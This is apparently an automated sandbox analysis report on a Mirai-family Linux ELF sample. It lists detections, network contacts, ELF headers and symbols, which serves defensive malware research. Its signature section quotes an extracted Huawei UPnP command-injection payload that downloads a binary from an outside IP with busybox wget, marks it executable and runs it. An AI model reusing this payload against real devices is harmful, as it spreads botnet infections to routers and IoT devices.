Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
JGG1a56dcB.elf

Overview

General Information

Sample name:JGG1a56dcB.elf
renamed because original name is a hash value
Original sample name:76d78ee0f506495328a91377700e7f42.elf
Analysis ID:1428821
MD5:76d78ee0f506495328a91377700e7f42
SHA1:28abadda7df259a003d129c92825683146bd6446
SHA256:6188f21394351041ff8d95e937c3cdfe2df3f5769710ab3824fa9331a66c3e5f
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Contains symbols with names commonly found in malware
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1428821
Start date and time:2024-04-19 17:05:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:JGG1a56dcB.elf
renamed because original name is a hash value
Original Sample Name:76d78ee0f506495328a91377700e7f42.elf
Detection:MAL
Classification:mal60.troj.linELF@0/0@0/0
  • VT rate limit hit for: JGG1a56dcB.elf
Command:/tmp/JGG1a56dcB.elf
PID:6223
Exit Code:1
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • JGG1a56dcB.elf (PID: 6223, Parent: 6137, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/JGG1a56dcB.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
JGG1a56dcB.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6223.1.00007f76e0011000.00007f76e002c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: JGG1a56dcB.elfReversingLabs: Detection: 34%
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: JGG1a56dcB.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: JGG1a56dcB.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: ELF static info symbol of initial sampleName: attack_gudp_flood
      Source: ELF static info symbol of initial sampleName: attack_parser.c
      Source: ELF static info symbol of initial sampleName: attack_registry.c
      Source: JGG1a56dcB.elfELF static info symbol of initial sample: huawei_scanner_pid
      Source: JGG1a56dcB.elfELF static info symbol of initial sample: huawei_scanner_rawpkt
      Source: JGG1a56dcB.elfELF static info symbol of initial sample: malware_scanner
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: Pid=%d Path=%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      Source: classification engineClassification label: mal60.troj.linELF@0/0@0/0
      Source: /tmp/JGG1a56dcB.elf (PID: 6223)Queries kernel information via 'uname': Jump to behavior
      Source: JGG1a56dcB.elf, 6223.1.00005574085c3000.0000557408628000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
      Source: JGG1a56dcB.elf, 6223.1.00007fff1f3a9000.00007fff1f3ca000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/JGG1a56dcB.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/JGG1a56dcB.elf
      Source: JGG1a56dcB.elf, 6223.1.00005574085c3000.0000557408628000.rw-.sdmpBinary or memory string: tU!/etc/qemu-binfmt/sparc
      Source: JGG1a56dcB.elf, 6223.1.00007fff1f3a9000.00007fff1f3ca000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: JGG1a56dcB.elf, type: SAMPLE
      Source: Yara matchFile source: 6223.1.00007f76e0011000.00007f76e002c000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: JGG1a56dcB.elf, type: SAMPLE
      Source: Yara matchFile source: 6223.1.00007f76e0011000.00007f76e002c000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      No configs have been found
      SourceDetectionScannerLabelLink
      JGG1a56dcB.elf34%ReversingLabsLinux.Trojan.Gafgyt
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://schemas.xmlsoap.org/soap/encoding/JGG1a56dcB.elffalse
        high
        http://schemas.xmlsoap.org/soap/envelope/JGG1a56dcB.elffalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          109.202.202.202pXwuZJXauT.elfGet hashmaliciousMirai, OkiruBrowse
            uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
              wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                  qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                    qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                      FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                        qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                          46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                            l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                              91.189.91.43pXwuZJXauT.elfGet hashmaliciousMirai, OkiruBrowse
                                uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                  wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                    JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                      qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                        qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                          qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                            46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                              l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                  91.189.91.42pXwuZJXauT.elfGet hashmaliciousMirai, OkiruBrowse
                                                    uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                      wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                        JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                          qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                            qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                              FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CANONICAL-ASGB1NSVzJh1X7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      pXwuZJXauT.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      FtRTuVcia6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                      • 91.189.91.42
                                                                      qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      3M2y5KkOrL.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      qIEANK2huJ.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      CANONICAL-ASGB1NSVzJh1X7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      pXwuZJXauT.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      FtRTuVcia6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                      • 91.189.91.42
                                                                      qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      3M2y5KkOrL.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 91.189.91.42
                                                                      qIEANK2huJ.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 185.125.190.26
                                                                      INIT7CHpXwuZJXauT.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                      • 109.202.202.202
                                                                      qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 109.202.202.202
                                                                      l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      No context
                                                                      No context
                                                                      No created / dropped files found
                                                                      File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
                                                                      Entropy (8bit):5.945101294610553
                                                                      TrID:
                                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                      File name:JGG1a56dcB.elf
                                                                      File size:143'865 bytes
                                                                      MD5:76d78ee0f506495328a91377700e7f42
                                                                      SHA1:28abadda7df259a003d129c92825683146bd6446
                                                                      SHA256:6188f21394351041ff8d95e937c3cdfe2df3f5769710ab3824fa9331a66c3e5f
                                                                      SHA512:426cb01151e1b020d20542a10c6221ad9e5698c0730648f5faecbab1ad97a43c7316c0cd64d3fc803ad2d04169af69f7d4cdb26b0538d85ad73dbc7a108c2699
                                                                      SSDEEP:1536:OKFIgFQrrw+SSqVWoKIdlLSkkWYtNU8hJv+8neE8MyR9t25blNZr8uDBtbA:OuINlqVWozddStWYfhLn3ey5DZQ0Bq
                                                                      TLSH:19E35C23277A0A27C4E5A43501F7D337B2B69F851A75910BBA605FCC3F2AAE031537A5
                                                                      File Content Preview:.ELF...........................4.........4. ...(..........................................................4`...............H...H...H................dt.Q................................@..(....@.a@................#.....`...`.....!.....",..@.....".........`

                                                                      ELF header

                                                                      Class:ELF32
                                                                      Data:2's complement, big endian
                                                                      Version:1 (current)
                                                                      Machine:Sparc
                                                                      Version Number:0x1
                                                                      Type:EXEC (Executable file)
                                                                      OS/ABI:UNIX - System V
                                                                      ABI Version:0
                                                                      Entry Point Address:0x101c4
                                                                      Flags:0x0
                                                                      ELF Header Size:52
                                                                      Program Header Offset:52
                                                                      Program Header Size:32
                                                                      Number of Program Headers:4
                                                                      Section Header Offset:119468
                                                                      Section Header Size:40
                                                                      Number of Section Headers:17
                                                                      Header String Table Index:14
                                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                      NULL0x00x00x00x00x0000
                                                                      .initPROGBITS0x100b40xb40x1c0x00x6AX004
                                                                      .textPROGBITS0x100d00xd00x185380x00x6AX004
                                                                      .finiPROGBITS0x286080x186080x140x00x6AX004
                                                                      .rodataPROGBITS0x286200x186200x28b80x00x2A008
                                                                      .eh_framePROGBITS0x3c0000x1c0000x480x00x3WA004
                                                                      .tbssNOBITS0x3c0480x1c0480x80x00x403WAT004
                                                                      .ctorsPROGBITS0x3c0480x1c0480x80x00x3WA004
                                                                      .dtorsPROGBITS0x3c0500x1c0500x80x00x3WA004
                                                                      .jcrPROGBITS0x3c0580x1c0580x40x00x3WA004
                                                                      .gotPROGBITS0x3c05c0x1c05c0x1c80x40x3WA004
                                                                      .dataPROGBITS0x3c2280x1c2280x26c0x00x3WA008
                                                                      .bssNOBITS0x3c4980x1c4940x2fc80x00x3WA008
                                                                      .commentPROGBITS0x00x1c4940xda40x00x0001
                                                                      .shstrtabSTRTAB0x00x1d2380x710x00x0001
                                                                      .symtabSYMTAB0x00x1d5540x34b00x100x0163354
                                                                      .strtabSTRTAB0x00x20a040x27f50x00x0001
                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                      LOAD0x00x100000x100000x1aed80x1aed86.02610x5R E0x10000.init .text .fini .rodata
                                                                      LOAD0x1c0000x3c0000x3c0000x4940x34604.62340x6RW 0x10000.eh_frame .tbss .ctors .dtors .jcr .got .data .bss
                                                                      TLS0x1c0480x3c0480x3c0480x00x80.00000x4R 0x4.tbss
                                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                      NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                      .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      .symtab0x100b40SECTION<unknown>DEFAULT1
                                                                      .symtab0x100d00SECTION<unknown>DEFAULT2
                                                                      .symtab0x286080SECTION<unknown>DEFAULT3
                                                                      .symtab0x286200SECTION<unknown>DEFAULT4
                                                                      .symtab0x3c0000SECTION<unknown>DEFAULT5
                                                                      .symtab0x3c0480SECTION<unknown>DEFAULT6
                                                                      .symtab0x3c0480SECTION<unknown>DEFAULT7
                                                                      .symtab0x3c0500SECTION<unknown>DEFAULT8
                                                                      .symtab0x3c0580SECTION<unknown>DEFAULT9
                                                                      .symtab0x3c05c0SECTION<unknown>DEFAULT10
                                                                      .symtab0x3c2280SECTION<unknown>DEFAULT11
                                                                      .symtab0x3c4980SECTION<unknown>DEFAULT12
                                                                      .symtab0x00SECTION<unknown>DEFAULT13
                                                                      .LLC3.symtab0x2ad980NOTYPE<unknown>DEFAULT4
                                                                      .rem.symtab0x19a2844FUNC<unknown>DEFAULT2
                                                                      .udiv.symtab0x19a0820FUNC<unknown>DEFAULT2
                                                                      .umul.symtab0x19a1c12FUNC<unknown>DEFAULT2
                                                                      .urem.symtab0x199e832FUNC<unknown>DEFAULT2
                                                                      1337.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      C.23.5636.symtab0x2a02824OBJECT<unknown>DEFAULT4
                                                                      C.3.3264.symtab0x28a28204OBJECT<unknown>DEFAULT4
                                                                      C.7.4158.symtab0x29cd854OBJECT<unknown>DEFAULT4
                                                                      C.7.4174.symtab0x290ec44OBJECT<unknown>DEFAULT4
                                                                      C.8.4175.symtab0x290c836OBJECT<unknown>DEFAULT4
                                                                      C.8.4206.symtab0x29d1021OBJECT<unknown>DEFAULT4
                                                                      C.9.4150.symtab0x298d41024OBJECT<unknown>DEFAULT4
                                                                      LOCAL_ADDR.symtab0x3f0484OBJECT<unknown>DEFAULT12
                                                                      _Exit.symtab0x223c0128FUNC<unknown>DEFAULT2
                                                                      _GLOBAL_OFFSET_TABLE_.symtab0x3c05c0OBJECT<unknown>HIDDEN10
                                                                      _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __CTOR_END__.symtab0x3c04c0OBJECT<unknown>DEFAULT7
                                                                      __CTOR_LIST__.symtab0x3c0480OBJECT<unknown>DEFAULT7
                                                                      __C_ctype_b.symtab0x3c2a04OBJECT<unknown>DEFAULT11
                                                                      __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __C_ctype_b_data.symtab0x29d28768OBJECT<unknown>DEFAULT4
                                                                      __DTOR_END__.symtab0x3c0540OBJECT<unknown>DEFAULT8
                                                                      __DTOR_LIST__.symtab0x3c0500OBJECT<unknown>DEFAULT8
                                                                      __EH_FRAME_BEGIN__.symtab0x3c0000OBJECT<unknown>DEFAULT5
                                                                      __FRAME_END__.symtab0x3c0440OBJECT<unknown>DEFAULT5
                                                                      __GI___C_ctype_b.symtab0x3c2a04OBJECT<unknown>HIDDEN11
                                                                      __GI___close.symtab0x217c4124FUNC<unknown>HIDDEN2
                                                                      __GI___close_nocancel.symtab0x217d032FUNC<unknown>HIDDEN2
                                                                      __GI___ctype_b.symtab0x3c2a44OBJECT<unknown>HIDDEN11
                                                                      __GI___errno_location.symtab0x1a5f036FUNC<unknown>HIDDEN2
                                                                      __GI___fcntl_nocancel.symtab0x19a5c196FUNC<unknown>HIDDEN2
                                                                      __GI___fgetc_unlocked.symtab0x263b0344FUNC<unknown>HIDDEN2
                                                                      __GI___glibc_strerror_r.symtab0x1dc8032FUNC<unknown>HIDDEN2
                                                                      __GI___libc_close.symtab0x217c4124FUNC<unknown>HIDDEN2
                                                                      __GI___libc_fcntl.symtab0x19b20248FUNC<unknown>HIDDEN2
                                                                      __GI___libc_open.symtab0x21840132FUNC<unknown>HIDDEN2
                                                                      __GI___libc_read.symtab0x21948132FUNC<unknown>HIDDEN2
                                                                      __GI___libc_write.symtab0x218c4132FUNC<unknown>HIDDEN2
                                                                      __GI___open.symtab0x21840132FUNC<unknown>HIDDEN2
                                                                      __GI___open_nocancel.symtab0x2184c32FUNC<unknown>HIDDEN2
                                                                      __GI___read.symtab0x21948132FUNC<unknown>HIDDEN2
                                                                      __GI___read_nocancel.symtab0x2195432FUNC<unknown>HIDDEN2
                                                                      __GI___sigaddset.symtab0x1e99444FUNC<unknown>HIDDEN2
                                                                      __GI___sigdelset.symtab0x1e9c044FUNC<unknown>HIDDEN2
                                                                      __GI___sigismember.symtab0x1e96c40FUNC<unknown>HIDDEN2
                                                                      __GI___uClibc_fini.symtab0x21bec168FUNC<unknown>HIDDEN2
                                                                      __GI___uClibc_init.symtab0x21ce892FUNC<unknown>HIDDEN2
                                                                      __GI___write.symtab0x218c4132FUNC<unknown>HIDDEN2
                                                                      __GI___write_nocancel.symtab0x218d032FUNC<unknown>HIDDEN2
                                                                      __GI___xpg_strerror_r.symtab0x1dca8300FUNC<unknown>HIDDEN2
                                                                      __GI__exit.symtab0x223c0128FUNC<unknown>HIDDEN2
                                                                      __GI_abort.symtab0x1fe28280FUNC<unknown>HIDDEN2
                                                                      __GI_accept.symtab0x1e54496FUNC<unknown>HIDDEN2
                                                                      __GI_atoi.symtab0x204b424FUNC<unknown>HIDDEN2
                                                                      __GI_bind.symtab0x1e5a436FUNC<unknown>HIDDEN2
                                                                      __GI_brk.symtab0x279b888FUNC<unknown>HIDDEN2
                                                                      __GI_chdir.symtab0x19c2088FUNC<unknown>HIDDEN2
                                                                      __GI_close.symtab0x217c4124FUNC<unknown>HIDDEN2
                                                                      __GI_closedir.symtab0x1a15c208FUNC<unknown>HIDDEN2
                                                                      __GI_config_close.symtab0x22ee864FUNC<unknown>HIDDEN2
                                                                      __GI_config_open.symtab0x22f3080FUNC<unknown>HIDDEN2
                                                                      __GI_config_read.symtab0x22b8c860FUNC<unknown>HIDDEN2
                                                                      __GI_connect.symtab0x1e5c896FUNC<unknown>HIDDEN2
                                                                      __GI_dirfd.symtab0x1a23456FUNC<unknown>HIDDEN2
                                                                      __GI_exit.symtab0x206c8168FUNC<unknown>HIDDEN2
                                                                      __GI_fclose.symtab0x230b8860FUNC<unknown>HIDDEN2
                                                                      __GI_fcntl.symtab0x19b20248FUNC<unknown>HIDDEN2
                                                                      __GI_fflush_unlocked.symtab0x25fc8992FUNC<unknown>HIDDEN2
                                                                      __GI_fgetc.symtab0x25a9c320FUNC<unknown>HIDDEN2
                                                                      __GI_fgetc_unlocked.symtab0x263b0344FUNC<unknown>HIDDEN2
                                                                      __GI_fgets.symtab0x25bdc260FUNC<unknown>HIDDEN2
                                                                      __GI_fgets_unlocked.symtab0x26508160FUNC<unknown>HIDDEN2
                                                                      __GI_fopen.symtab0x2341424FUNC<unknown>HIDDEN2
                                                                      __GI_fork.symtab0x210001088FUNC<unknown>HIDDEN2
                                                                      __GI_fputs_unlocked.symtab0x1b96860FUNC<unknown>HIDDEN2
                                                                      __GI_fseek.symtab0x27dc836FUNC<unknown>HIDDEN2
                                                                      __GI_fseeko64.symtab0x27fd4448FUNC<unknown>HIDDEN2
                                                                      __GI_fstat.symtab0x22448116FUNC<unknown>HIDDEN2
                                                                      __GI_fwrite_unlocked.symtab0x1b9ac196FUNC<unknown>HIDDEN2
                                                                      __GI_getc_unlocked.symtab0x263b0344FUNC<unknown>HIDDEN2
                                                                      __GI_getdtablesize.symtab0x2257440FUNC<unknown>HIDDEN2
                                                                      __GI_getegid.symtab0x2259c32FUNC<unknown>HIDDEN2
                                                                      __GI_geteuid.symtab0x225bc32FUNC<unknown>HIDDEN2
                                                                      __GI_getgid.symtab0x225dc32FUNC<unknown>HIDDEN2
                                                                      __GI_getpagesize.symtab0x2260456FUNC<unknown>HIDDEN2
                                                                      __GI_getpid.symtab0x2150488FUNC<unknown>HIDDEN2
                                                                      __GI_getrlimit.symtab0x2264492FUNC<unknown>HIDDEN2
                                                                      __GI_getsockname.symtab0x1e62836FUNC<unknown>HIDDEN2
                                                                      __GI_getuid.symtab0x226a032FUNC<unknown>HIDDEN2
                                                                      __GI_inet_addr.symtab0x1e51c40FUNC<unknown>HIDDEN2
                                                                      __GI_inet_aton.symtab0x26e9c244FUNC<unknown>HIDDEN2
                                                                      __GI_inet_ntop.symtab0x1e25c704FUNC<unknown>HIDDEN2
                                                                      __GI_inet_pton.symtab0x1dea0556FUNC<unknown>HIDDEN2
                                                                      __GI_initstate_r.symtab0x202ac244FUNC<unknown>HIDDEN2
                                                                      __GI_ioctl.symtab0x27a18228FUNC<unknown>HIDDEN2
                                                                      __GI_isatty.symtab0x26e0832FUNC<unknown>HIDDEN2
                                                                      __GI_kill.symtab0x19ca092FUNC<unknown>HIDDEN2
                                                                      __GI_listen.symtab0x1e67828FUNC<unknown>HIDDEN2
                                                                      __GI_lseek.symtab0x226c896FUNC<unknown>HIDDEN2
                                                                      __GI_lseek64.symtab0x28544124FUNC<unknown>HIDDEN2
                                                                      __GI_mbrtowc.symtab0x27c3c168FUNC<unknown>HIDDEN2
                                                                      __GI_mbsnrtowcs.symtab0x27cec220FUNC<unknown>HIDDEN2
                                                                      __GI_memchr.symtab0x26628280FUNC<unknown>HIDDEN2
                                                                      __GI_memcpy.symtab0x1c09c4212FUNC<unknown>HIDDEN2
                                                                      __GI_memmove.symtab0x1bab81508FUNC<unknown>HIDDEN2
                                                                      __GI_mempcpy.symtab0x2851c32FUNC<unknown>HIDDEN2
                                                                      __GI_memrchr.symtab0x26a80256FUNC<unknown>HIDDEN2
                                                                      __GI_memset.symtab0x1d144416FUNC<unknown>HIDDEN2
                                                                      __GI_mmap.symtab0x22730108FUNC<unknown>HIDDEN2
                                                                      __GI_mremap.symtab0x227a4104FUNC<unknown>HIDDEN2
                                                                      __GI_munmap.symtab0x2281492FUNC<unknown>HIDDEN2
                                                                      __GI_nanosleep.symtab0x228d472FUNC<unknown>HIDDEN2
                                                                      __GI_open.symtab0x21840132FUNC<unknown>HIDDEN2
                                                                      __GI_opendir.symtab0x1a324228FUNC<unknown>HIDDEN2
                                                                      __GI_raise.symtab0x21564264FUNC<unknown>HIDDEN2
                                                                      __GI_random.symtab0x1ff58108FUNC<unknown>HIDDEN2
                                                                      __GI_random_r.symtab0x20124152FUNC<unknown>HIDDEN2
                                                                      __GI_read.symtab0x21948132FUNC<unknown>HIDDEN2
                                                                      __GI_readdir.symtab0x1a4c0184FUNC<unknown>HIDDEN2
                                                                      __GI_readdir64.symtab0x22ad0188FUNC<unknown>HIDDEN2
                                                                      __GI_readlink.symtab0x19e3c96FUNC<unknown>HIDDEN2
                                                                      __GI_recv.symtab0x1e69492FUNC<unknown>HIDDEN2
                                                                      __GI_recvfrom.symtab0x1e6f096FUNC<unknown>HIDDEN2
                                                                      __GI_sbrk.symtab0x22924108FUNC<unknown>HIDDEN2
                                                                      __GI_select.symtab0x19f0c84FUNC<unknown>HIDDEN2
                                                                      __GI_send.symtab0x1e75092FUNC<unknown>HIDDEN2
                                                                      __GI_sendto.symtab0x1e7ac96FUNC<unknown>HIDDEN2
                                                                      __GI_setsid.symtab0x19f6880FUNC<unknown>HIDDEN2
